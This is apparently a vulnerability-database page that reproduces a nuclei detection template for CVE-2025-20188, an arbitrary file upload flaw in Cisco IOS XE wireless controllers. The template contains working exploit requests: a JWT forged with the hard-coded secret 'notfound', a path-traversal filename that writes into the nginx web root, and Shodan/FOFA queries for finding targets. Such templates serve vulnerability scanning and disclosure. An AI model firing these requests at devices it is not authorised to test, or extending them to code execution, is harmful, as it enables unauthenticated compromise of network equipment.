Lucene search
K

Cisco IOS XE WLC - Arbitrary File Upload

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 95 Views

Vulnerability in Cisco IOS XE allows remote file upload via crafted HTTPS requests.

Related
Refs
Code
id: CVE-2025-20188

info:
  name: Cisco IOS XE WLC - Arbitrary File Upload
  author: iamnoooob,pdresearch,DhiyaneshDK
  severity: critical
  description: |
    A vulnerability in the Out-of-Band Access Point (AP) Image Download feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system.This vulnerability is due to the presence of a hard-coded JSON Web Token (JWT) on an affected system.An attacker could exploit this vulnerability by sending crafted HTTPS requests to the AP image download interface. A successful exploit could allow the attacker to upload files, perform path traversal, and execute arbitrary commands with root privileges.
  impact: |
    Unauthenticated attackers can exploit hard-coded JWT tokens to upload arbitrary files and execute commands with root privileges on Cisco IOS XE WLC devices, leading to complete device compromise and potential network-wide access.
  remediation: |
    Apply the patch provided in Cisco Security Advisory cisco-sa-wlc-file-uplpd-rHZG9UfC.
  reference:
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
    - https://horizon3.ai/attack-research/attack-blogs/cisco-ios-xe-wlc-arbitrary-file-upload-vulnerability-cve-2025-20188-analysis/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-20188
    cwe-id: CWE-798
    epss-score: 0.17894
    epss-percentile: 0.96814
  metadata:
    verified: true
    max-request: 2
    fofa-query: '"IOS-Self-Signed-Certificate" && port="8443"'
    shodan-query: 'http.html_hash:1076109428 ssl.cert.issuer.cn:"IOS-Self-Signed-Certificate" port:8443'
  tags: cve,cve2025,cisco,file-upload,intrusive,rce,vkev,vuln

flow: |
    if (http(1)) {
    http(2) && http(3)
    }

variables:
  exp: "{{unix_time(10000)}}"
  secret: "notfound"
  payload: '{"reqid":"cdb_token_request_id1","exp":{{exp}}}'
  filename: "{{randbase(8)}}"
  path: "usr/binos/openresty/nginx/html/"
  string: "{{to_lower('{{randstr}}')}}"

http:
  - raw:
      - |
        POST /ap_spec_rec/upload/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: jwt={{randstr}}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Accept-Encoding: gzip

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="file"; filename="../..{{path}}/{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 401"
          - "contains(body, 'invalid jwt string')"
        condition: and
        internal: true

  - raw:
      - |
        POST /ap_spec_rec/upload/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: jwt={{ generate_jwt(payload,"HS256",secret) }}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Accept-Encoding: gzip

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="file"; filename="../../{{path}}{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(header, 'openresty')"
        condition: and

  - raw:
      - |
        GET /{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '{{string}}')"
        condition: and
# digest: 490a0046304402202902a123ef89e331c32e2a6c5ee9a97a838e4ff1b87543f70baa7906e9ad1e8b022029d911449cebd5a9e0ff06df4e7729157ac0f747e29c93758858e92d17be5cf6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.110
EPSS0.17894
SSVC
95